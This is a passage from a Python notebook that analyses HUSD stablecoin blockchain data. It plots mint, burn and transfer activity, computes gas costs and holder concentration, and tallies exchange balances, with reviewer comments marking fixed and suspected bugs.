# Fixed: removed a duplicate assignment of tx_over_date that repeated the
# identical path.
balances = '../plots/husd/husd_balances.csv'
avg_gas_over_date = '../plots/husd/husd_avg_gas_over_date.csv'
avg_value_over_date = '../plots/husd/husd_avg_value_over_date.csv'
positive_cumulated_balances = '../plots/husd/husd_positive_cumulated_balances.csv'
circulating_supply = '../plots/husd/husd_circulating_supply.csv'
unique_recipients_per_day_over_date = '../plots/husd/husd_unique_recipients_per_day_over_date.csv'
unique_senders_per_day_over_date = '../plots/husd/husd_unique_senders_per_day_over_date.csv'
exchanges = '../plots/exchanges.csv'

# data (raw event logs)
transfer = '../data/husd/transfer/0_husd_transfer_8174400-10370273.csv'
mint = '../data/husd/issue/husd_issue.csv'
burn = '../data/husd/redeem/husd_redeem.csv'
# -

# <center></center>
# # Data

df = pd.read_csv(transfer)

pd.set_option('display.float_format', lambda x: '%.3f' % x)

# ## Basics

# Convert from base units to HUSD (the token uses 8 decimals).
df['txvalue'] = df['txvalue'].astype(float) / 10**8

df.describe()

# <center></center>
# ## Dataset

print('Start:')
print('Block: {:^30}\nTimestamp: {:^20}\nUTC Time: {:^25}\n'.format(
    df['blocknumber'].iloc[0],
    df['timestamp'].iloc[0],
    str(datetime.fromtimestamp(df['timestamp'].iloc[0]))))
print('End:')
print('Block: {:^30}\nTimestamp: {:^20}\nUTC Time: {:^25}\n'.format(
    df['blocknumber'].iloc[-1],
    df['timestamp'].iloc[-1],
    str(datetime.fromtimestamp(df['timestamp'].iloc[-1]))))

# ## Total Nr. of Blocks

print('Total Nr. of Blocks: {}'.format(df['blocknumber'].iloc[-1] - df['blocknumber'].iloc[0]))

# <center></center>
# ## Total Nr. of Transfer Events

print('Total Nr. of Events: {:,.0f}'.format(df.describe().loc['count', 'timestamp']))

# <center></center>
# ## Total Nr. of Addresses

# NOTE(review): this counts distinct recipient addresses only (txto);
# senders that never received are not included — confirm that is intended.
print('Total Nr. of Addresses: {}'.format(len(df['txto'].unique())))

# <center></center>
# ## Addresses with funds

bal = pd.read_csv(balances)
print('Total Nr. of Addresses with funds: {}'.format(len(bal[bal['txvalue'] > 0])))

# <center></center>
# ## Avg. Transaction Value

# Fixed: txvalue was already converted to HUSD above; the original divided
# by 10**8 a second time, understating the average by a factor of 10^8.
print('Avg. Transaction Value: {:,.0f} HUSD'.format(np.mean(df['txvalue'])))

# <center></center>
# ## Total Gas Costs

# gas_price is in wei; divide by 1e18 to express costs in ether.
df['costs'] = (df['gas_price'] / 10**18) * df['gas_used']
print('Total Gas spent for Transfers: {:,.3f} ether'.format(sum(df['costs'])))

# <center></center>
# ## Initial HUSD Supply

# +
# first mint event
# 0xdc6bb2a1aff2dbb2613113984b5fbd560e582c0a4369149402d7ea83b0f5983e
# -

# <center></center>
# ## Total HUSD Supply

sum(pd.read_csv(mint)['txvalue'] / 10**8) - sum(pd.read_csv(burn)['txvalue'] / 10**8)

# <center></center>
# # I. Event analysis
# ## I.I. Mint Event

# ## Plot new issued tokens over date

# +
print('\n\n')
fig = plt.figure(figsize=(40, 25), dpi=250)
ax = fig.subplots()
plt.grid()
plt.title(r'I s s u e d \ \ H U S D' + '\n', size=120)
ax.yaxis.get_offset_text().set_fontsize(50)
plt.xlabel('\n' + r'D a t e ', size=120)
plt.ylabel(r'H U S D' + '\n', size=120)
# Fixed: a second plt.yticks(fontsize=30) call immediately overrode the
# first (fontsize=60); only the effective one is kept.
plt.yticks(fontsize=30)
plt.xticks(labels=["\nJul '19'", "Oct '19", "\nJan '20", "Apr '20", "\nJul '20"],
           ticks=[0, 73, 165, 256, 347], fontsize=60)

def plot_issue_over_date():
    """Draw one vertical bar per day with the total HUSD minted that day."""
    _issue = pd.read_csv(mint)
    iss = _issue.loc[:, ['timestamp', 'txvalue']]
    iss['utc'] = iss['timestamp'].apply(lambda x: str(datetime.utcfromtimestamp(x))[0:10])
    iss = iss.groupby('utc', as_index=False)['txvalue'].sum()
    # Reindex onto a complete daily range so days without mints show as 0.
    a = iss['utc'].iloc[0]
    b = iss['utc'].iloc[-1]
    idx = pd.date_range(a, b)
    iss = iss.set_index('utc')
    iss.index = pd.DatetimeIndex(iss.index)
    iss = iss.reindex(idx, fill_value=0)
    counter = 0
    for i in range(0, len(iss)):
        plt.plot([counter, counter], [0, iss['txvalue'].iloc[counter] / (10**8)],
                 color='black', linewidth=3)
        counter += 1
    return

plt.tight_layout(pad=5)
plot_issue_over_date()
plt.savefig('../pics/husd/husd_issued_husd_over_date.pdf')
# -

# ## Further info

df = pd.read_csv(mint)
# df[df['txvalue'] == max(df['txvalue'])]
# Fixed: dropped a stray, unused third argument (':,0f') passed to format().
print('Issue Events: {}\nIssued HUSD: {:,.0f}\n'.format(len(df), sum(df['txvalue']) / 10**8))
# NOTE(review): row 3274 and the address are hard-coded as the largest
# issue — verify against the commented lookup above if the data changes.
print('Largest issue: {:,.0f} HUSD\n . . . to address: {}\n'.format(
    df.loc[3274, 'txvalue'] // 10**8, '0x55fe002aeff02f77364de339a1292923a15844b8'))

# <center></center>
# ## I.II. Burn Event

# ## Plot burned tokens over date

# +
print('\n\n')
fig = plt.figure(figsize=(40, 25))
ax = fig.subplots()
plt.grid()
plt.title(r'B u r n e d \ \ H U S D' + '\n', size=120)
ax.yaxis.get_offset_text().set_fontsize(50)
plt.xlabel('\n' + r'D a t e', size=120)
plt.ylabel(r'H U S D' + '\n', size=120)
# Fixed: removed the redundant first plt.yticks call (it was overridden).
plt.yticks(fontsize=30)
plt.xticks(labels=["\nJul '19'", "Oct '19", "\nJan '20", "Apr '20", "\nJul '20"],
           ticks=[0, 73, 165, 256, 347], fontsize=60)

def plot_burn_over_date():
    """Draw one vertical bar per day with the total HUSD burned that day."""
    _dbf = pd.read_csv(burn)
    dbf = _dbf.loc[:, ['timestamp', 'txvalue']]
    dbf['utc'] = dbf['timestamp'].apply(lambda x: str(datetime.utcfromtimestamp(x))[0:10])
    dbf = dbf.groupby('utc', as_index=False)['txvalue'].sum()
    a = dbf['utc'].iloc[0]
    b = dbf['utc'].iloc[-1]
    idx = pd.date_range(a, b)
    dbf = dbf.set_index('utc')
    dbf.index = pd.DatetimeIndex(dbf.index)
    dbf = dbf.reindex(idx, fill_value=0)
    counter = 0
    for i in range(0, len(dbf)):
        plt.plot([counter, counter], [0, dbf['txvalue'].iloc[counter] / (10**8)],
                 color='black', linewidth=3)
        counter += 1
    return

plt.tight_layout(pad=5)
plot_burn_over_date()
plt.savefig('../pics/husd/husd_burned_husd_over_date.pdf')
# -

# ## Further info

# +
df = pd.read_csv(burn)
print('Burn Events: {}\nBurned husd: {:,.0f}'.format(len(df), sum(df['txvalue']) / 10**8))
# Fixed output typo: "addesses" -> "addresses".
print('. . . from {} addresses\n'.format(len(df['address'].unique())))
# NOTE(review): .sum()[0] takes the FIRST group alphabetically, not the
# maximum — the "Largest burn" label may be wrong; consider .sort_values().
print('Largest burn: {:,.0f} husd\n . . . from address: {}\n'.format(
    df.groupby('address')['txvalue'].sum()[0] / 10**8,
    df.groupby("address")["txvalue"].sum().index[0]))
# -

# <center></center>
# ## Plot circulating supply

# +
print('\n\n')
fig = plt.figure(figsize=(20, 12), dpi=500)
ax = fig.subplots()
plt.grid(True)
plt.title(r'C i r c u l a t i n g \ \ H U S D \ \ S u p p l y' + '\n', size=60)
plt.xlabel('\n' + r'D a t e', size=60)
plt.ylabel(r'H U S D' + '\n', size=60)
ax.yaxis.get_offset_text().set_fontsize(25)
plt.yticks(fontsize=30)
plt.xticks(labels=["\nJul '19'", "Oct '19", "\nJan '20", "Apr '20", "\nJul '20"],
           ticks=[0, 73, 165, 256, 347], fontsize=30)

circ = pd.read_csv(circulating_supply, index_col='Unnamed: 0')
plt.plot(range(0, 347), circ['txvalue'].cumsum() / 10**8, color='black',
         linewidth=4, label='HUSD supply')
plt.fill_between(range(0, 347), 0, circ['txvalue'].cumsum() / 10**8,
                 alpha=0.2, facecolor='#2D728F')
lgnd = plt.legend(loc='upper left', fontsize=40)
plt.tight_layout(pad=5)
plt.savefig('../pics/husd/husd_cirulating_supply.pdf')
# -

# <center></center>
# ## I.III. Transfer Event

# ## Plot transfers over date

# +
print('\n\n')
fig = plt.figure(figsize=(20, 12), dpi=500)
ax = fig.subplots()
plt.grid(True)
plt.title(r'H U S D \ \ T r a n s f e r s' + '\n', size=60)
plt.xlabel('\n' + r'D a t e', size=50)
plt.ylabel(r'T r a n s f e r s' + '\n', size=50)
plt.yticks(np.arange(0, 601, 100),
           np.vectorize(lambda x: f'{x:,.0f}')(np.arange(0, 601, 100)), fontsize=30)
plt.xticks(labels=["\nJul '19'", "Oct '19", "\nJan '20", "Apr '20", "\nJul '20"],
           ticks=[0, 73, 165, 256, 347], fontsize=30)

def plot_txs_over_date(df, lwd, label, col='#2D728F', plusbetween=False):
    """Plot a daily-count series; optionally shade the area under it."""
    plt.plot(np.arange(0, len(df['txs'])), df['txs'], color=col, linewidth=lwd, label=label)
    if plusbetween:
        plt.fill_between(np.arange(0, len(df['txs'])), 0, df['txs'],
                         alpha=0.1, facecolor='black')

plot_txs_over_date(df=pd.read_csv(tx_over_date, index_col=0), col='black',
                   lwd=2, label='Transfers', plusbetween=True)
plot_txs_over_date(pd.read_csv(unique_senders_per_day_over_date, index_col='Unnamed: 0'),
                   col='#9DB469', lwd=2, label='Unique Senders per day')
plot_txs_over_date(pd.read_csv(unique_recipients_per_day_over_date, index_col='Unnamed: 0'),
                   lwd=2, label='Unique Recipients per day')

lgnd = ax.legend(loc='upper right', fontsize=35)
lgnd.legendHandles[0].set_linewidth(5.0)
lgnd.legendHandles[1].set_linewidth(5.0)
lgnd.legendHandles[2].set_linewidth(5.0)
plt.tight_layout(pad=5)
plt.savefig('../pics/husd/husd_tx_over_date.pdf')
plt.show()
# -

# <center></center>
# ## Most active addresses
# From:

fr = pd.read_csv(tx_count_from, index_col='Unnamed: 0').sort_values('txs', ascending=False)
to = pd.read_csv(tx_count_to, index_col='Unnamed: 0').sort_values('txs', ascending=False)

fr = pd.DataFrame(fr.loc[:fr.index[10], 'txs'])
fr['tag'] = ['-', 'Huobi', 'Huobi 2', 'Huobi 9', 'FTX Exchange', 'Huobi 10',
             'Burn gate of Huobi', '-', '-', '-', 'Huobi 12']
fr

# To:

to = pd.DataFrame(to.loc[:to.index[10], 'txs'])
to['tag'] = ['Huobi', 'Huobi 9', '-', 'Huobi 2', 'Burn gate of Huobi', '-',
             'FTX Exchange', '-', 'Huobi 10', '-', '-']
to

# <center></center>
# ## Activity distribution

df_from = pd.read_csv(tx_count_from, index_col=0)
df_to = pd.read_csv(tx_count_to, index_col=0)
df_all = pd.concat([df_from, df_to])
# Total activity = sends + receives per address.
df = df_all.groupby(df_all.index).sum()
print('{} addresses in total'.format(len(df)))

df = df.sort_values('txs')
# Bucket the addresses by activity level (each bucket excludes the ones above).
gr0 = len(df.loc[df['txs'] >= 500000])
gra = len(df.loc[df['txs'] >= 100000]) - gr0
grb = len(df.loc[df['txs'] >= 50000]) - gr0 - gra
grc = len(df.loc[df['txs'] >= 10000]) - gr0 - gra - grb
grd = len(df.loc[df['txs'] >= 1000]) - gr0 - gra - grb - grc
gre = len(df.loc[df['txs'] >= 100]) - gr0 - gra - grb - grc - grd
grf = len(df.loc[df['txs'] >= 10]) - gr0 - gra - grb - grc - grd - gre
grg = len(df.loc[df['txs'] <= 10])
grh = len(df.loc[df['txs'] == 1])

pd.DataFrame({'Transactions': ['> 500.000', '100.000-500.000', '50.000-100.000',
                               '10.000-50.000', '1.000-10.000', '100-1.000',
                               '10-100', '< 10', '1'],
              'Addresses': [gr0, gra, grb, grc, grd, gre, grf, grg, grh]})

# <center></center>
# ## Plot average transfer amount
# ## Jan '20 - Jul '20

# +
print('\n\n')
df = pd.read_csv(avg_value_over_date, index_col=0)
# Restrict to 2020 (row 165 is Jan 1st in the daily index).
df = df.loc[df.index[165]:, :]

plt.figure(figsize=(12, 7), dpi=800)
plt.grid(True)
plt.plot(np.arange(0, len(df.index.tolist())), df['txvalue'], color='black',
         label='Avg. Amount/Day', linewidth=2)
plt.fill_between(np.arange(0, len(df.index.tolist())), 0, df['txvalue'],
                 alpha=0.2, facecolor='#2D728F')
plt.xlabel('\n' + 'D a t e', fontsize=35)
plt.ylabel('H U S D' + '\n', fontsize=30)
plt.title("H U S D\nA v g. \ \ T r a n s f e r \ \ A m o u n t" + "\n", size=30)
plt.legend(loc="upper right", fontsize=20, shadow=True)
plt.ticklabel_format(style='plain')
plt.xticks(labels=["\nJan '20", "Feb '20", "\nMar '20", "Apr '20", "\nMay '20", "Jun '20", "\nJul '20"],
           ticks=[0, 31, 60, 90, 121, 152, 182], fontsize=23)
plt.yticks(np.arange(0, 1000001, 200000),
           np.vectorize(lambda x: f'{x:,.0f}')(np.arange(0, 1000001, 200000)), fontsize=15)
plt.tight_layout(pad=1)
plt.savefig('../pics/husd/husd_avgtxvalue_jan20.pdf')
# -

# <center></center>
# ## Further Info

df.describe()

# <center></center>
# ## Plot average gas costs
# ## Jan '20 - Jul '20

print('\n\n')
df = pd.read_csv(avg_gas_over_date, index_col='Unnamed: 0')
df = df.loc[df.index[165]:, :]
plt.figure(figsize=(12, 7), dpi=800)
plt.grid(True)
plt.plot(np.arange(0, len(df.index.tolist())), df['gas'], color='black',
         label='Avg. Gas Costs/Day', linewidth=2)
plt.fill_between(np.arange(0, len(df.index.tolist())), 0, df['gas'],
                 alpha=0.2, facecolor='#2D728F')
plt.xlabel('\nD a t e', fontsize=35)
plt.ylabel('E t h e r\n', fontsize=30)
plt.title('H U S D\nA v g. \ \ G a s \ \ C o s t s\n', size=30)
lgnd = plt.legend(loc='upper left', fontsize=20, shadow=True)
plt.ticklabel_format(style='plain')
plt.xticks(labels=["\nJan '20", "Feb '20", "\nMar '20", "Apr '20", "\nMay '20", "Jun '20", "\nJul '20"],
           ticks=[0, 31, 60, 90, 121, 152, 182], fontsize=20)
plt.yticks(np.arange(0, 0.05, 0.01),
           np.vectorize(lambda x: f'{x:,.3f}')(np.arange(0, 0.05, 0.01)), fontsize=15)
plt.tight_layout(pad=1)
lgnd.legendHandles[0].set_linewidth(3.0)
plt.savefig('../pics/husd/husd_avggascosts_jan20.pdf')

df.describe()

# <center></center>
# # II. Balances Analysis

df = pd.read_csv(positive_cumulated_balances, index_col='Unnamed: 0')
df

# <center></center>
# ## II.I. Quick Summary

(df[df['balance'] > 0]['balance']).describe().apply(lambda x: format(x, 'f'))

print('{}/{} with less than 1 husd'.format(len(df[df['balance'] < 1]['balance']), len(df['balance'])))

# <center></center>
# ## II.II. Balance Table

# +
df = pd.read_csv(positive_cumulated_balances, index_col=0)

def get_distribution(perc):
    """Split the cumulated-balance table at quantile `perc`.

    Returns (number of top accounts, lower-part balance, upper-part balance,
    lower share of total supply, upper share of total supply).
    """
    per = round(df.index[-1] * perc)
    entities = df.index[-1] - per
    upper = df.loc[per:, :]
    lower = df.loc[:per, :]
    lower_ = lower['cum'].iloc[-1]
    upper_ = (upper['cum'].iloc[-1] - upper['cum'].iloc[0])
    return entities, lower_, upper_, lower_ / upper['cum'].iloc[-1], upper_ / (upper['cum'].iloc[-1])

idx90, lower90, upper90, per10, per90 = get_distribution(0.90)
idx95, lower95, upper95, per05, per95 = get_distribution(0.95)
idx99, lower99, upper99, per01, per99 = get_distribution(0.99)
idx999, lower999, upper999, per001, per999 = get_distribution(0.999)

df = pd.DataFrame(
    [[f'{idx999:,.0f}', round(per999 * 100, 2), f'{upper999:,.0f}'],
     [f'{idx99:,.0f}', round(per99 * 100, 2), f'{upper99:,.0f}'],
     [f'{idx95:,.0f}', round(per95 * 100, 2), f'{upper95:,.0f}'],
     [f'{idx90:,.0f}', round(per90 * 100, 2), f'{upper90:,.0f}']],
    index=['0.1% of the richest accounts', '1% of the richest accounts',
           '5% of the richest accounts', '10% of the richest accounts'],
    columns=['Accounts in total', '% of total supply', 'husd amount'])
df
# -

# <center></center>
# ## II.III. Rich list

# +
pd.options.mode.chained_assignment = None

df = pd.read_csv(positive_cumulated_balances)
balance = df
rich = df.loc[df.index[-10]:, :]

# Tag the known exchange addresses among the top-10 holders.
ex = pd.read_csv(exchanges, header=None)
loop = rich.iterrows()
for i, j in loop:
    if j['address'] in ex[0].tolist():
        rich.loc[i, 'nametag'] = ex[ex[0] == j['address']][1].values[0]
rich
# -

# <center></center>
# ## Exchange balances
#
# The seven cells below originally repeated an identical copy-pasted loop
# for each exchange; the shared logic is factored into one helper.

# +
ex = pd.read_csv(exchanges, header=None)

def print_exchange_balance(name, first_row, last_row):
    """Sum HUSD balances over the exchange's tagged address rows and print the share of total supply.

    Args:
        name: display name used in the printed summary.
        first_row, last_row: inclusive row range of the exchange's addresses
            in the `ex` table (column 0 holds the addresses).
    """
    bal = 0
    for addr in ex.loc[first_row:last_row, 0]:
        val = balance['balance'][balance['address'] == addr]
        if not val.empty:
            bal += val.values[0]
    print('{} Total Balance: {:.0f}\n{:.2f}% of Total'.format(
        name, bal, bal / balance.loc[balance.index[-1], 'cum'] * 100))
# -

# ## Huobi

print_exchange_balance('Huobi', 0, 73)

# <center></center>
# ## Binance

print_exchange_balance('Binance', 74, 88)

# <center></center>
# ## Bitfinex

print_exchange_balance('Bitfinex', 89, 110)

# <center></center>
# ## OKEx

print_exchange_balance('OKEx', 111, 115)

# <center></center>
# ## Bittrex

print_exchange_balance('Bittrex', 116, 119)

# <center></center>
# ## Compound

print_exchange_balance('Compound', 151, 179)

# <center></center>
# ## Poloniex

print_exchange_balance('Poloniex', 247, 266)

# <center></center>
# # II. IV. Pie Chart

# +
df = pd.read_csv(positive_cumulated_balances, index_col='Unnamed: 0')
# Keep the 80 largest holders individually, lump the rest into 'others'.
aa = df.iloc[df.index[-1] - 80:]
bb = df['balance'].iloc[:df.index[-1] - 80]
# Fixed: DataFrame.append was removed in pandas 2.0; pd.concat is equivalent.
df = pd.concat([aa, pd.DataFrame({'address': 'others', 'balance': sum(bb)}, index=[0])])

label = []
counter = 0

def getlabel(i):
    """Append a (possibly empty) slice label; only the last 5 slices get one."""
    global counter
    if i:
        if not i == 'others':
            label.append(i + '...')
        else:
            label.append(i)
    else:
        label.append('')
    counter += 1

[getlabel(i[:6]) if counter >= len(df) - 5 else getlabel('') for i in df['address']]
print()

# +
print('\n\n')

# Colorspace colors by: https://colorspace.r-forge.r-project.org/index.html
colorspace_set3 = ['#EEBD92', '#FFB3B5', '#85D0F2', '#BCC3FE', '#E7B5F5',
                   '#FEAFDA', '#61D8D6', '#76D9B1', '#A4D390', '#CFC982']
colorsp_dynamic = ['#DB9D85', '#87AEDF', '#9DB469', '#6DBC86', '#3DBEAB',
                   '#4CB9CC', '#C2A968', '#BB9FE0', '#DA95CC', '#E494AB']
colorspa_dark_3 = ['#B675E0', '#5991E4', '#00AA5A', '#6F9F00', '#CE7D3B']
colorspa_dyna_5 = ['#9DB469', '#87AEDF', '#DA95CC', '#DB9D85', '#3DBEAB']

fig = plt.figure(figsize=(25, 15), dpi=400)
ax = fig.add_subplot()

# NOTE(review): the second autopct condition (x > 5) is unreachable because
# x > 1.5 already matches first — slices <= 1.5% simply get no percentage.
aa = plt.pie(df['balance'], colors=colorsp_dynamic, labels=label,
             autopct=lambda x: r'{:.1f}\%'.format(x) if x > 1.5 else r'{:.0f}\%'.format(x) if x > 5 else '',
             pctdistance=0.8, labeldistance=1.05, radius=1,
             explode=[0.01 for i in range(0, len(df['balance']))],
             wedgeprops={'linewidth': 0.8, 'edgecolor': 'k'}, startangle=0)

# Custom Modifications (hand-tuned label positions/sizes for readability)
# aa[-1][-1].set_x(-0.7268917458682129)
aa[-1][-1].set_fontsize(35)
aa[-1][-2].set_fontsize(40)
# aa[-1][-2].set_x(0.19977073082370535)
# aa[-1][-2].set_y(0.8000006952023211)
aa[-1][-3].set_fontsize(27)
aa[-1][-4].set_fontsize(23)
aa[-1][-5].set_fontsize(20)
aa[-1][-6].set_fontsize(16)
aa[-1][-7].set_fontsize(13)
aa[-1][-8].set_fontsize(9)
aa[-1][-9].set_fontsize(9)
aa[-1][-10].set_fontsize(9)
aa[-1][-11].set_fontsize(8)

fontsize = -43
for i in aa[1]:
    i.set_fontsize(fontsize)
    fontsize += 1
aa[1][-1].set_fontsize(55)
aa[1][-3].set_y(0.24526206965343738)
aa[1][-4].set_y(0.16709989305583238)
aa[1][-5].set_y(0.0989980411375326)

plt.tight_layout(pad=5)
plt.title('H U S D \ \ D i s t r i b u t i o n', fontsize=50)
circ = plt.Circle((0, 0), 0.5, color='black', fc='white', linewidth=1.25)
ax.add_artist(circ)
plt.savefig('../pics/husd/husd_distribution_pie.pdf')
# -

# ## II.V. Lorenz curve

df = pd.read_csv(positive_cumulated_balances, index_col='Unnamed: 0')
df

# +
# Normalize cumulated balances to [0, 1] for the full population and for
# the interquartile (Q1-Q3) sub-population.
y_all = df['cum'] / df['cum'].iloc[-1]
x_all = (np.arange(start=0, stop=len(df['cum']), step=1) / (len(df['cum'])))

y_25_75 = df['cum'].iloc[int(df.index[-1] * 0.25):int(df.index[-1] * 0.75)]
y_25_75 = y_25_75 / max(y_25_75)
x_25_75 = np.arange(start=0, stop=len(y_25_75), step=1) / (len(y_25_75))
# -

print('Q3-Q1 (in husd):')
df['balance'].iloc[int(df.index[-1] * 0.25):int(df.index[-1] * 0.75)].describe().apply(lambda x: format(x / (10**0), 'f'))

print('\n\n')
fig = plt.figure(figsize=(15, 15))
ax = fig.add_subplot()
plt.grid()
plt.title(r'L o r e n z \ \ C u r v e' + '\n', fontsize=50)
plt.xlabel('\n' + r'\% \ \ of \ \ A d d r e s s e s', fontsize=30)
plt.ylabel(r'\% \ o f \ \ t o t a l \ \ H U S D \ \ s u p p l y' + '\n', fontsize=30)
plt.xticks(fontsize=20)
plt.yticks(fontsize=20)
ax.plot(x_all, y_all, linewidth=5, color='#2D728F', label=r'$\ All$')
ax.plot(x_25_75, y_25_75, linewidth=5, color='#87AEDF', label=r'$\ Q_3 - Q_1$')
plt.legend(fontsize=35)
# Diagonal = perfect equality reference line.
plt.plot([0, 1], [0, 1], transform=ax.transAxes, linewidth=4,
         ls=(0, (5, 10)), color='black')
ax.set_xlim([0, 1.05])
plt.savefig('../pics/husd/husd_lorenzcurve.pdf')
individual_token_analysis/husd_descriptive_analysis.ipynb